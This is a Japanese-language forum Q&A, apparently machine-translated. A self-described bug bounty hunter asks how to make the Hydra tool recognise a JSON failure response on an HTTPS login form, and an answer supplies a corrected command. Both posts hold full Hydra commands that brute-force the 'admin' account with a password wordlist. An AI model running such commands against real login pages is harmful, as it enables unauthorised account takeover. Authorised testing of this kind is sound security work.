json応答でHydraを実行する方法は？

Question

私はいくつかのバグ報奨金狩りをしており、ヒドラで問題を抱えています。したがって、httpsログインフォームがあり、リクエストは次のとおりです。

https://bbsite/crp/login?password=pass&username=admin

問題は、応答がjsonにあることです。したがって、不正なログインの場合は次のようになります。

{"success":false,"greska":"Pogre\u0161no."}

だから私の解決策は：

hydra bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt

しかし、これは機能しておらず、理由はわかりません。誰かが解決策を提案できますか？

Daniel Max · Answer

見つかったソリューション：

hydra bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\u0161no\"}" -l admin -P /root/Downloads/pass.txt

ログイン失敗の場合はF =を追加する必要があります。 \で\をエスケープする必要がありました。